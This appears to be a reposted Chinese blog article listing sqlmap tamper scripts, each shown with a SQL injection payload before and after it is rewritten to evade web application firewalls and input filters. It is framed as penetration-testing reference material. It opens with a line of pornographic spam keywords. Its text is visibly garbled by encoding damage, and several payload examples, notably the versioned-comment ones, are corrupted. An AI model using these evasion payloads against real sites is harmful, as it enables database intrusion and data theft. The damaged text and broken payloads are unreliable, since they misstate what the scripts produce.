国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

sqlmap常用tamper匯總及使用指導(dǎo)

這篇具有很好參考價(jià)值的文章主要介紹了sqlmap常用tamper匯總及使用指導(dǎo)。希望對大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

遍歷tamper腳本
GitHub - m4ll0k/Atlas: Quick SQLMap Tamper Suggester

一、編碼:

1.1 base64encode.py
base64編碼所有字符
("1' AND SLEEP(5)#")
替換后
'MScgQU5EIFNMRUVQKDUpIw=='
1.2 charencode.py
URL編碼
SELECT FIELD FROM%20TABLE
替換后
%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
已經(jīng)測試過的數(shù)據(jù)庫:Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0
1.3 chardoubleencode.py
二次URL編碼(不處理已編碼的)
SELECT FIELD FROM%20TABLE
替換后
%2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
1.4 charunicodeencode.py
unicode編碼
SELECT FIELD%20FROM TABLE
替換后
%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
  • 必要條件:ASP,ASP.NET
  • 使用數(shù)據(jù)庫:Microsoft SQL Server 2000
  • Microsoft SQL Server 2005
  • MySQL 5.1.56
  • PostgreSQL 9.0.3
1.5 charunicodeescape.py
url解碼中的%篡改成\\
1.6 htmlencode.py
html編碼

二、空格過濾

2.1 overlongutf8.py
空格替換為%C0%A0
2.2 space2comment.py
空格替換成/**/
'SELECT id FROM users'
替換后
'SELECT/**/id/**/FROM/**/users'
2.3 space2morecomment.py
空格替換成/**_**/
已經(jīng)測試過的數(shù)據(jù)庫:mysql5.0 and 5.5
'SELECT id FROM users'
替換后
'SELECT/**_**/id/**_**/FROM/**_**/users'
2.4 space2mssqlblank.py
將空格替換成隨機(jī)的以下字符(mssql)
'%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A'
'SELECT id FROM users'
替換后
'SELECT%0Did%0DFROM%04users'
適用數(shù)據(jù)庫:Microsoft SQL Server
已經(jīng)測試過的數(shù)據(jù)庫:sql server 2000 sql server 2005
2.5 space2mssqlhash.py
將空格替換成%23%0A
適用數(shù)據(jù)庫:mssql mysql
2.6 space2mysqlblank.py
作用:空格替換其它空白符號(mysql)
SELECT id FROM users
替換后
SELECT%0Bid%0BFROM%A0users
2.7 space2mysqldash.py
作用:替換空格字符(' ')(' – ')后跟一個(gè)破折號注釋一個(gè)新行(' n')
('1 AND 9227=9227')
替換后
'1--%0AAND--%0A9227=9227'
2.8 space2plus.py
將空格替換成+
('SELECT id FROM users')
替換后
'SELECT+id+FROM+users'
2.9 space2randomblank.py
將空格替換成以下隨機(jī)的字符
"%09", "%0A", "%0C", "%0D"
測試過的數(shù)據(jù)庫:
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0
2.10 space2hash.py
作用:繞過過濾‘=’ 替換空格字符(”),(’ – ‘)后跟一個(gè)破折號注釋,一個(gè)隨機(jī)字符串和一個(gè)新行(’ n’)
'1 AND 9227=9227'
替換后
'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'

三、union關(guān)鍵詞替換

3.1 0eunion.py
使用e0UNION替換UNION
已經(jīng)測試過的數(shù)據(jù)庫:Mysql,Mssql
3.2 dunion.py
將UNION換成DUNION
必要條件:Oracle
3.3 misunion.py
UNION篡改為-.1UNION
3.4 unionalltonnion.py
將union all select 替換成union select
'-1 UNION ALL SELECT'
替換后
'-1 UNION SELECT'
3.5 unionalltounion.py
替換UNION ALL SELECT 為UNION SELECT
('-1 UNION ALL SELECT')
替換后
'-1 UNION SELECT'

四、符號

4.1 apostrophemask.py
把雙引號替換為單引號,將'替換成UTF-8url編碼的%EF%BC%87
4.2 apostrophenullencode.py
將'替換成%00%27
("1 AND '1'='1")
替換后
'1 AND %00%271%00%27=%00%271'
4.3 between.py
將>字符替換為NOT BETWEEN 0 AND
將=字符替換為BETWEEN # AND # (這個(gè)#看下面的例子)
'1 AND A = B--'
替換后
'1 AND A BETWEEN B AND B--'
  • 已經(jīng)測試過的數(shù)據(jù)庫:Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0
4.4 greatest.py
使用greatest替換>????
('1 AND A > B')
替換后
'1 AND GREATEST(A,B+1)=A'
  • 已經(jīng)測試過的數(shù)據(jù)庫:MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0
4.5 symboliclogical.py
將and和or的邏輯運(yùn)算符分別替換為(&&和||)
"1 AND '1'='1"
替換后
"1 %26%26 '1'='1"
4.6 bluecoat.py
將sql語句后的空格字符替換為%09,LIKE替換字符=
已經(jīng)測試過的數(shù)據(jù)庫:mysql5.1之前
4.7 commalesslimit.py
替換字符的位置
'LIMIT 2, 3'
替換后
'LIMIT 3 OFFSET 2'
必要條件:mysql
已經(jīng)測試過的數(shù)據(jù)庫:mysql5.0,mysql5.5
4.8 concat2concatws.py
將concat(a,b)替換成concat_ws(mid(char(0),0,0),a,b)
'CONCAT(1,2)'
替換后
CONCAT_WS(MID(CHAR(0),0,0),1,2)
必要條件:mysql
已經(jīng)測試過的數(shù)據(jù)庫:mysql5.0
4.9 equaltolike.py
將=篡改成LIKE
SELECT * FROM users WHERE id=1
替換成
SELECT * FROM users WHERE id LIKE 1
已經(jīng)測試過的數(shù)據(jù)庫:Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
4.10 equaltorlike.py
將=篡改成RLIKE
4.11 ifnull2ifisnull.py
作用:繞過對 IFNULL 過濾。
('IFNULL(1, 2)')
替換后
'IF(ISNULL(1),2,1)'

五、特殊繞過

5.1 randomcase.py
隨機(jī)大小寫
'function()'
替換后
'FuNcTiOn()'
5.2 lowercase.py
將字符轉(zhuǎn)換為小寫
5.3 uppercase.py
將關(guān)鍵字符替換成大寫
'insert'
替換后
'INSERT'
  • 已經(jīng)測試過的數(shù)據(jù)庫:Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0
5.4 multiplespaces.py
在sql關(guān)鍵字周圍添加多個(gè)空格
'1 UNION SELECT foobar'
替換后
'1?????UNION?????SELECT?????foobar'
5.5 percentage.py
在每一個(gè)字符前面添加一個(gè)百分比符號,asp語言允許
'SELECT FIELD FROM TABLE'
替換后
'%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E'
5.6 sp_password.py
將sp_password附加到有效負(fù)載的末尾,用來混淆
'1 AND 9227=9227-- '
替換后
'1 AND 9227=9227-- sp_password'
必要條件:mssql
5.7 varnish.py
附加一個(gè)HTTP頭來 X-originating-IP = "127.0.0.1" 來繞過防火墻
5.8 xforwardedfor.py
附加一個(gè)虛假的HTTP頭“X-Forwarded-For”
headers = kwargs.get("headers", {})headers["X-Forwarded-For"] = randomIP()return payload
5.9 unmagicquotes.py
作用:寬字符繞過 GPC??addslashes
1′ AND 1=1
替換后
1%bf%27 AND 1=1--
5.10 appendnullbyte.py
作用:在有效負(fù)荷結(jié)束位置加載零字節(jié)字符編碼(Microsoft Access數(shù)據(jù)庫)
('1 AND 1=1')
替換后
'1 AND 1=1%00'

六、注釋繞過

6.1 randomcomments.py
用/**/分割sql關(guān)鍵字
'INSERT'
替換成
'I/**/NS/**/ERT'
6.2 halfversionedmorekeywords.py
在每個(gè)關(guān)鍵字之前添加mysql版本注釋
"value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"
替換成
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
必要條件:mysql<5.1
已經(jīng)測試過的數(shù)據(jù)庫:mysql4.0.18,5.0.22
6.3 modsecurityversioned.py
作用:過濾空格,包含完整的查詢版本注釋
('1 AND 2>1--')
替換后
'1 /*!30874AND 2>1*/--'
6.4 modsecurityzeroversioned.py
作用:包含了完整的查詢與零版本注釋
('1 AND 2>1--')
替換后
'1 /*!00000AND 2>1*/--'
6.5 versionedkeywords.py
作用:對不是函數(shù)的關(guān)鍵字進(jìn)行注釋繞過 ?
1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
替換后
1/!UNION//!ALL//!SELECT//!NULL/,/!NULL/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/!AS//!CHAR/),CHAR(32)),CHAR(58,100,114,117,58))#
6.6 versionedmorekeywords.py
作用:注釋每一個(gè)關(guān)鍵字包括函數(shù)關(guān)鍵字
1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
替換后
1/!UNION//!ALL//!SELECT//!NULL/,/!NULL/,/!CONCAT/(/!CHAR/(58,122,114,115,58),/!IFNULL/(CAST(/!CURRENT_USER/()/!AS//!CHAR/),/!CHAR/(32)),/!CHAR/(58,115,114,121,58))#

文章來源地址http://www.zghlxwxcb.cn/news/detail-753901.html

到了這里,關(guān)于sqlmap常用tamper匯總及使用指導(dǎo)的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 【SQL注入】Sqlmap使用指南(手把手保姆版)持續(xù)更新

    【SQL注入】Sqlmap使用指南(手把手保姆版)持續(xù)更新

    官網(wǎng)下載地址:https://github.com/sqlmapproject/sqlmap sqlmap 是一款開源的滲透測試工具,可以自動(dòng)化進(jìn)行SQL注入的檢測、利用,并能接管數(shù)據(jù)庫服務(wù)器。它具有功能強(qiáng)大的檢測引擎,為滲透測試人員提供了許多專業(yè)的功能并且可以進(jìn)行組合,其中包括數(shù)據(jù)庫指紋識別、數(shù)據(jù)讀取和訪問

    2024年04月10日
    瀏覽(32)
  • 【網(wǎng)絡(luò)安全-sql注入(5)】sqlmap以及幾款自動(dòng)化sql注入工具的詳細(xì)使用過程(提供工具)

    【網(wǎng)絡(luò)安全-sql注入(5)】sqlmap以及幾款自動(dòng)化sql注入工具的詳細(xì)使用過程(提供工具)

    分享一個(gè)非常詳細(xì)的網(wǎng)絡(luò)安全筆記,是我學(xué)習(xí)網(wǎng)安過程中用心寫的,可以點(diǎn)開以下鏈接獲?。?超詳細(xì)的網(wǎng)絡(luò)安全筆記 (也可以拿自己的環(huán)鏡來玩,我是用pikachu靶場來演示的) 【網(wǎng)路安全 --- pikachu靶場安裝】超詳細(xì)的pikachu靶場安裝教程(提供靶場代碼及工具)_網(wǎng)絡(luò)安全_Ai

    2024年02月08日
    瀏覽(19)
  • 滲透測試模擬(使用sqlmap進(jìn)行sql注入漏洞判斷,利用該漏洞進(jìn)行掛馬)

    滲透測試模擬(使用sqlmap進(jìn)行sql注入漏洞判斷,利用該漏洞進(jìn)行掛馬)

    環(huán)境:對某網(wǎng)站進(jìn)行滲透測試。 (PHP+Mysql開發(fā)的網(wǎng)站,用于WEB漏洞教學(xué)和檢測的) 工具:sqlmap(Kali Linux中自帶or官網(wǎng)下載Windows版) 此次實(shí)驗(yàn)所涉及的sqlmap參數(shù): 一、信息收集 二、漏洞挖掘 (1)判斷網(wǎng)站是否存在sql注入漏洞 使用工具,sqlmap: sqlmap -u \\\"目標(biāo)網(wǎng)站地址\\\" --ba

    2024年02月15日
    瀏覽(22)
  • 【2023最新版】超詳細(xì)Sqlmap安裝保姆級教程,SQL注入使用指南,收藏這一篇就夠了

    【2023最新版】超詳細(xì)Sqlmap安裝保姆級教程,SQL注入使用指南,收藏這一篇就夠了

    一、sqlmap簡介 sqlmap是一個(gè)自動(dòng)化的SQL注入工具,其主要功能是掃描,發(fā)現(xiàn)并利用給定的URL進(jìn)行SQL注入。目前支持的數(shù)據(jù)庫有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等 Sqlmap采用了以下5種獨(dú)特的SQL注入技術(shù) 基于布爾類型的盲注,即可以根據(jù)

    2024年02月10日
    瀏覽(27)
  • SQL注入工具之SQLmap入門操作

    SQL注入工具之SQLmap入門操作

    了解SQLmap 基礎(chǔ)操作 SQLmap 是一款自動(dòng)化的 SQL 注入工具,可以用于檢測和利用SQL注入漏洞。 以下是 SQLmap 的入門操作步驟: 1.下載 SQLmap :可以從官方網(wǎng)站(https://sqlmap.org/)下載最新版本的SQLmap。 2.打開終端 :在終端中進(jìn)入 SQLmap 所在的目錄。 3.輸入命令 :使用以下命令運(yùn)行

    2024年02月21日
    瀏覽(23)
  • SQL注入 - sqlmap聯(lián)動(dòng)burpsuite之burp4sqlmap++插件

    SQL注入 - sqlmap聯(lián)動(dòng)burpsuite之burp4sqlmap++插件

    目錄 sqlmap和burpsuite介紹 sqlmap4burp++介紹 sqlmap4burp++的使用 小插曲:sqlmap報(bào)錯(cuò)文件不存在怎么辦? SqlMap sqlmap 是一款自動(dòng)化檢測與利用SQL注入漏洞的免費(fèi)開源工具。 可用于檢測利用五種不同類型的SQL注入: 布爾型盲注(Boolean-based blind)即可以根據(jù)返回頁面判斷條件真假的注入

    2024年03月12日
    瀏覽(23)
  • WEB漏洞-SQL注入-利用SQLMAP工具繞過WAF

    WEB漏洞-SQL注入-利用SQLMAP工具繞過WAF

    訪問使用阿里云搭建的網(wǎng)站(存在自帶的阿里云盾)。 可以看到此時(shí)網(wǎng)站可以正常訪問,可以進(jìn)行正常注入。 使用工具進(jìn)行注入。 可以看到在使用工具注入沒多久后便返回了不存在注入點(diǎn)的信息。 因?yàn)榻?jīng)常會(huì)用到SQLMAP這款工具對注入點(diǎn)進(jìn)行檢測,在遇到WAF時(shí),如果還想繼續(xù)

    2024年02月12日
    瀏覽(25)
  • 在kali linux里利用SQLmap實(shí)現(xiàn)SQL注入

    在kali linux里利用SQLmap實(shí)現(xiàn)SQL注入

    SQLMap 是一個(gè)自動(dòng)化的SQL注入工具,其主要功能是掃描、發(fā)現(xiàn)并利用給定URL的SQL注入漏洞,內(nèi)置了很多繞過插件,支持的數(shù)據(jù)庫是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。 注意:sqlmap只是用來檢測和利用sql注入點(diǎn),并不

    2024年02月04日
    瀏覽(24)
  • 【SQL注入】SQLMAP v1.7.11.1 漢化版

    【SQL注入】SQLMAP v1.7.11.1 漢化版

    【SQL注入】SQLMAP v1.7.11.1 漢化版 SQLMAP是一款開源的自動(dòng)化SQL注入工具,用于掃描和利用Web應(yīng)用程序中的SQL注入漏洞。它在安全測試領(lǐng)域被廣泛應(yīng)用,可用于檢測和利用SQL注入漏洞,以驗(yàn)證應(yīng)用程序的安全性。 SQL注入是一種常見的Web應(yīng)用程序漏洞,攻擊者可以通過在用戶輸入的

    2024年01月19日
    瀏覽(20)
  • sqlmap 是一個(gè)自動(dòng)化的 sql 注入滲透工具

    一.介紹 sqlmap 是一個(gè)自動(dòng)化的 sql 注入滲透工具,指紋檢測、注入方式、注入成功后的取數(shù)據(jù)等等都是自動(dòng)化的,sqlmap 還提供了很多腳本.但在實(shí)踐測試的時(shí)候基本用不上.用于檢測和利用 Web 應(yīng)用程序中的 SQL 注入漏洞。它自動(dòng)化了識別和利用 SQL 注入漏洞的過程,并可用于執(zhí)

    2024年01月23日
    瀏覽(19)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包